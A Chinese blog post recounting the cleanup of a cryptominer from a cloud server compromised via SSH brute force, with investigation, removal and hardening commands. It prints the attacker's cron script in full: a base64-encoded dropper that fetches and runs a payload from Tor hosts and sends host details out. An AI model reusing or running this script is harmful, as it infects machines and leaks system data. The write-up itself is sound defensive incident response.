记录一次清理挖矿程序

最新推荐文章于 2025-04-07 01:15:00 发布
最新推荐文章于 2025-04-07 01:15:00 发布
阅读量780 收藏
点赞数 2
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43315515/article/details/114285355
版权

之前的服务器密码设置的很简单,ssh的端口使用的默认端口22,很容易被别人暴力破解了

先查看一下暴力破解时使用的ip

[root@hostname ~]# find /var/log -name 'secure*' -type f | while read line;do awk '/Failed/{print $(NF-3)}' $line;done | awk '{a[$0]++}END{for (j in a) if(a[j] > 20) print j"="a[j]}' | sort -n -t'=' -k 2
82.156.118.142=23
36.155.9.133=84
182.92.112.94=127
182.92.178.16=1880
182.92.156.24=3992
182.92.107.110=4113

接下来就干掉这个挖矿程序

[root@hostname ~]# top

找到挖矿程序的pid 进入这个进程的目录 找一下文件位置

[root@hostname ~]# cd /proc/196121
[root@hostname 196121]# ll

dr-xr-xr-x 2 root root 0 Mar  2 12:53 attr
-rw-r--r-- 1 root root 0 Mar  2 13:19 autogroup
-r-------- 1 root root 0 Mar  2 13:19 auxv
-r--r--r-- 1 root root 0 Mar  2 13:19 cgroup
--w------- 1 root root 0 Mar  2 13:19 clear_refs
-r--r--r-- 1 root root 0 Mar  2 12:53 cmdline
-rw-r--r-- 1 root root 0 Mar  2 12:54 comm
-rw-r--r-- 1 root root 0 Mar  2 13:19 coredump_filter
-r--r--r-- 1 root root 0 Mar  2 13:19 cpuset
lrwxrwxrwx 1 root root 0 Mar  2 13:19 cwd -> /
-r-------- 1 root root 0 Mar  2 13:19 environ
lrwxrwxrwx 1 root root 0 Mar  2 13:19 exe -> '/root/864954f50a56c303d427168efc739e93'

可能是root目录下的一个文件 不确定是哪个文件

[root@hostname ~]# cd /root
[root@hostname ~]# ls -a
.   aegis_install.sh  .bash_logout   .bashrc  .config  install.sh  package.xml  .pip              .python_history  .systemd-service.sh  .viminfo
..  .bash_history     .bash_profile  .cache   .cshrc   .npmrc      .pearrc      .pydistutils.cfg  .ssh             .tcshrc              .wget-hsts

查看一下定时任务是否存在异常信息

[root@hostname ~]# crontab -l
44 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &

查看一下这个文件吧

[root@hostname ~]# vi .systemd-service.sh

#!/bin/bash
exec &>/dev/null
echo bhajQKVmnmwXJTe4r3ZpAgfJzVxELCErQ/WVBdKALcIpzlP8lOUlY7Z8/eyGdDFC
echo YmhhalFLVm1ubXdYSlRlNHIzWnBBZ2ZKelZ4RUxDRXJRL1dWQmRLQUxjSXB6bFA4bE9VbFk3WjgvZXlHZERGQwpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

使用base64加密了 还是先干掉他吧

[root@hostname ~]# kill -9 196121  //杀掉进程
[root@hostname ~]# crontab -e   //删除定时任务 找到那一条删除掉 保存退出就行了
[root@hostname ~]# rm -f .systemd-service.sh   //删除脚本文件
[root@hostname ~]# cat /etc/passwd //检查是否存在未知用户
[root@hostname ~]# cat ~/.ssh/authorized_keys  //检查是否对未知用户授权
[root@hostname ~]# cat ~/.ssh/known_hosts //检查是否有未知的用host 发现多了一条 删除掉
172.21.22.3 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJu5cssiIPbPPjyI8JGPqp7RCNFlzHpn5pbtlu0O2pNXtiM3Cm7J8gwXn9RRG4tw83YJD8ApmBUjXzCt4wxRNaQ=
#下面的内容中存在异常信息就删除掉
[root@hostname ~]# vi /etc/rc.local  //用于添加开机启动命令
[root@hostname ~]# vi /etc/rc.d/rc.sysinit  //配置文件初始化Linux系统
[root@hostname ~]# vi /etc/inittab  //init进程就是根据/etc/inittab这个文件来在不同的运行级别启动相应的进程或执行相应的操作
[root@hostname ~]# vi /etc/profile  //系统环境变量

修改掉ssh默认端口号 删除掉Port 22前面的#,然后下一行输入新的端口号如:Port 2365(这个你自己定,最大不能超过65535)

[root@hostname ~]# vim /etc/ssh/sshd_config

在这里插入图片描述
我是用的是阿里云的服务器 需要在阿里云控制台配置安全组打开2365端口 记得关闭22端口
然后重启ssh服务就可以了

[root@hostname ~]# systemctl restart sshd.service

可以安装下clamav杀毒软件 扫描下是否存在蠕虫病毒 或者是否留有后门

安装方法 https://www.jianshu.com/p/e3d64cc80e6f

挖矿程序的代码后面会发布出来

块存储文件存储对象存储区别联系
罗伯特技术屋
08-04 143
一、块存储文件存储对象存储,三者的本质差别是什么?1、块存储典型设备:磁盘阵列,硬盘块存储主要是将裸磁盘空间整个映射给主机使用的,就是说例如磁盘阵列里面有5硬盘(为方便说明,假设每个硬盘1G),然后可以通过划逻辑盘、做Raid、或者LVM(逻辑卷)等种种方式逻辑划分出N个逻辑的硬盘。(假设划分完的逻辑盘也是5个,每个也是1G,但是这5个1G的逻辑盘已经原来的5个物理硬盘意义完全不同了。例如第一个逻辑硬盘A里面,可能第一个200M是来自物理硬盘1,第二个200M是来自物理硬盘2,所以逻辑硬盘A是由多个
【存储】块存储文件存储对象存储区别
晓峰博客笔记
07-11 1914
存储的目的就是为数据提供空间。硬盘/固态硬盘是存储最终的载体,之所以有块存储文件存储对象存储不同类型的存储设备,主要是由于使用介质存储数据的手段或方法不同来划分的。
块存储 对象存储 文件存储比较
u014007037的专栏
04-29 1299
块存储】 典型设备:磁盘阵列,硬盘 块存储主要是将裸磁盘空间整个映射给主机使用的,就是说例如磁盘阵列里面有5硬盘(为方便说明,假设每个硬盘1G),然后可以通过划逻辑盘、做Raid、或者LVM(逻辑卷)等种种方式逻辑划分出N个逻辑的硬盘。(假设划分完的逻辑盘也是5个,每个也是1G,但是这5个1G的逻辑盘已经于原来的5个物理硬盘意义完全不同了。例如第一个逻辑硬盘A里面,可能第一个200
分布式存储系统Ceph
最新发布
人人可学,人人可用,IT与AI不是高不可攀!
04-07 1341
Ceph 是一个分布式存储系统,支持对象存储块存储文件存储,具有高可用性、可扩展性自修复能力。它主要用于云计算、企业存储、数据中心等场景,广泛集成到 OpenStack、Kubernetes 等平台。
【存储】块存储文件存储对象存储区别
小鱼菜鸟的博客
07-22 3257
目录 简单说明 详细解释 存储分类 01 块存储(提供虚拟磁盘) 02 文件存储 03 对象存储 04 三种存储的区别对比 分布式块存储文件存储对象存储区别 理解Ceph的三种存储接口:设备、文件系统、对象存储 一. Ceph的设备存储接口 二. Ceph的文件系统存储接口 三. Ceph的对象存储接口 四. 总结 ...
三种存储类型比较-文件、对象存储
fan23v的专栏
12-26 1563
块存储文件存储是我们比较熟悉的两种主流的存储类型,而对象存储(Object-based Storage)是一种新的网络存储架构,基于对象存储技术的设备就是对象存储设备(Object-based Storage Device)简称OSD。         首先,我们介绍这两种传统的存储类型。通常来讲,所有磁盘阵列都是基于Block的模式,而所有的NAS产品都是文件级存储。 1、块存储
c++文件读写精确度_块存储文件存储对象存储三者之比较
weixin_35079766的博客
12-27 723
一、块存储文件存储对象存储,三者的本质差别是什么?1、块存储典型设备:磁盘阵列,硬盘块存储主要是将裸磁盘空间整个映射给主机使用的,就是说例如磁盘阵列里面有5硬盘(为方便说明,假设每个硬盘1G),然后可以通过划逻辑盘、做Raid、或者LVM(逻辑卷)等种种方式逻辑划分出N个逻辑的硬盘。(假设划分完的逻辑盘也是5个,每个也是1G,但是这5个1G的逻辑盘已经原来的5个物理硬盘意义完全不同了。例如...
块存储文件存储对象存储区别
06-11
详细介绍了块存储文件存储对象存储区别,有助于了解不同的存储方式之间的差异
块存储文件存储对象存储区别联系.pptx
01-04
"块存储文件存储对象存储区别联系" 块存储是指将数据存储为固定大小的数据,每个数据都可以单独访问修改。块存储通常采用设备的形式,如硬盘、SSD等,通过直接对设备进行读写操作来实现数据存储...
块存储文件存储对象存储这三者分布式文件存储系统的本质区别+-+Nicholas的专栏+-+优快云博客1
08-03
块存储】、【文件存储对象存储】是三种不同的存储模型,它们各自有特定的应用场景优势。在理解这些存储类型的本质区别之前,我们需要先了解它们的基本概念。 **1. 块存储** 块存储是底层的存储方式,以...
块存储文件存储对象存储区别
胜天半子
06-04 723
一、块存储 典型设备:磁盘阵列、硬盘 块存储主要是将裸磁盘空间整个映射给主机使用。 举例说明:磁盘阵列里有5硬盘,然后可以通过划逻辑盘、做Raid(Redundant Arrays of Independent Disks,RAID,有“独立磁盘构成的具有冗余能力的阵列”之意)、LVM(Logical Volume Manager,逻辑卷管理)等方式逻辑划分出N个逻辑的硬盘。 逻辑盘物理盘是不同的概念,假设每个硬盘100G,共5个硬盘,划分为逻辑盘也有5个,每个100G,但这5个逻辑盘原来的5个物理盘
块存储文件存储对象存储区别
就问你吃不吃药
04-23 1351
块存储典型设备:磁盘阵列,硬盘 块存储主要是将裸磁盘空间整个映射给主机使用的,就是说例如磁盘阵列里面有5磁盘(为方便说明,假设每个硬盘1G),然后可以通过划逻辑盘、做Raid、或者LVM(逻辑卷)等种种方式逻辑划分出N个逻辑的硬盘。(假设划分完的逻辑盘也是5个,每个也是1G,但是这5个1G的逻辑盘已经于原来的5个物理硬盘意义完全不同了。例如第一个逻辑硬盘A里面,可能第一个200M是来自物理硬盘1
对象存储文件存储块存储这三者之间有什么区别
Chihider的博客
09-16 1206
我们处于信息时代,已经完全离不开视频、音乐、图片、文本、表格这样的数据文件,存储的价值是让我们可以保存我们重要的信息,以便我们需要的时候能够查找、观摩、学习。但是对于企业用户来说,尤其是大数据时代,数据的价值被提到了前所未有的位置。数据就是企业的生命线。那么,对象存储文件存储块存储这三者之间有什么区别?下面就跟着摩杜云小杜一起来看看吧! 对象存储文件存储块存储这三者之间有什么区别? 一、对象存储 块存储性能出色但是不能共享,文件存储可以共享但是速度又总是不让人满意;做为不会做选择题的成年人既想性能,
块存储文件存储对象存储这三者的本质差别是什么?
喜欢打篮球的普通人
02-25 1119
文章目录1.块存储2.文件存储3.对象存储 1.块存储 块存储一般体现形式是卷或者硬盘(比如windows里面看到的c盘),数据是按字节来访问的,对于块存储而言,对里面存的数据内容格式是完全一无所知的。 好比下图中,数据就像玉米粒一样堆放在块存储里,块存储只关心玉米粒进来出去,不关心玉米粒之间的关系用途。 块存储只负责数据读取写入,因此性能很高,适用于对响应时间要求高的系统。比如数据库等。 2.文件存储 文件存储一般体现形式是目录文件(比如C:\Users\Downloads\text.do
文件存储块存储还是对象存储
己亥谷雨
08-20 1625
文件、对象是三种以不同的方式来保存、整理呈现数据的存储格式。这些格式各有各的功能限制。 文件存储会以文件文件夹的层次结构来整理呈现数据; 块存储会将数据拆分到任意划分且大小相同的卷中; 对象存储会管理数据并将其链接至关联的元数据。 文件存储:磁盘系统再一起(比如笔记本中的硬盘,支持文件共享) 块存储:只有裸磁盘,没有系统(比如一个移动硬盘) 文件存储也可以理解为是基于块存储的,因为裸磁盘加上系统就是文件存储 软件定义存储就是将存储硬件中的典型的存储控制器功能分离出来放到软件上
块存储文件存储对象存储
m0_57776598的博客
08-04 1万+
前言:根据不同的分类方式,存储也会被分成不同的类型,但是用途是一致的:存储的最终目的是存放数据。 存储的分类方式: 1.本地存储,外地存储 本地存储:就是你电脑里面内置的存储设备,比如:系统盘,机械盘,内存条等等,都是本地存储 外地存储:就相当于你的u盘,或者是移动硬盘都是外地存储 2.DAS,SAN,NAS (1).DAS(Direct Attached Storage)---直连式存储,就是拿一根线把存储设备直接连接到PC机或服务器上,那比如u盘,是用的接口把自身的存储设备直接PC相连接,
块存储文件存储对象存储
热门推荐
mary0712的博客
07-09 1万+
什么是文件存储文件存储也称为文件级存储或基于文件的存储,且正如您所想:数据会以单条信息的形式存储在文件夹中,正如您将几张纸放入一个马尼拉文件夹中一样。当您需要访问该数据时,您的计算机需要知道相应的查找路径。(注意,这可能会是一条蜿蜒冗长的路径。)存储在文件中的数据会根据数量有限的元数据来进行整理检索,这些元数据会告诉计算机文件所在的确切位置。它就像是数据文件的库卡目录。 请试想一下塞满文件柜的储藏室。每个文档都会按照某种类型的逻辑层次结构来排放 ——按文件柜、抽屉、文件夹,然后再是纸张。“分层
块存储文件存储对象存储的基本概念、应用场景功能对比
weixin_49324648的博客
07-20 1282
块存储文件存储对象存储的概念、应用场景、优势及缺点对比。
块存储文件存储对象存储各有什么区别
04-21
块存储文件存储对象存储是三种不同的数据存储方式。 块存储是将数据切分成固定大小的,每个独立存储,可以随机访问。块存储适合存储大型二进制数据,如虚拟机镜像、数据库的数据文件等。 文件存储是将数据组织成文件,文件可以分层次组织,方便管理查找。文件存储适合存储操作系统、应用程序等需要直接访问文件的数据。 对象存储是将数据组织成对象,每个对象有唯一的标识符,对象之间可以组成树状结构。对象存储适合存储非结构化数据,如图片、视频、音频等。 综上所述,块存储适合存储二进制数据,文件存储适合存储有层次结构的数据,对象存储适合存储非结构化数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值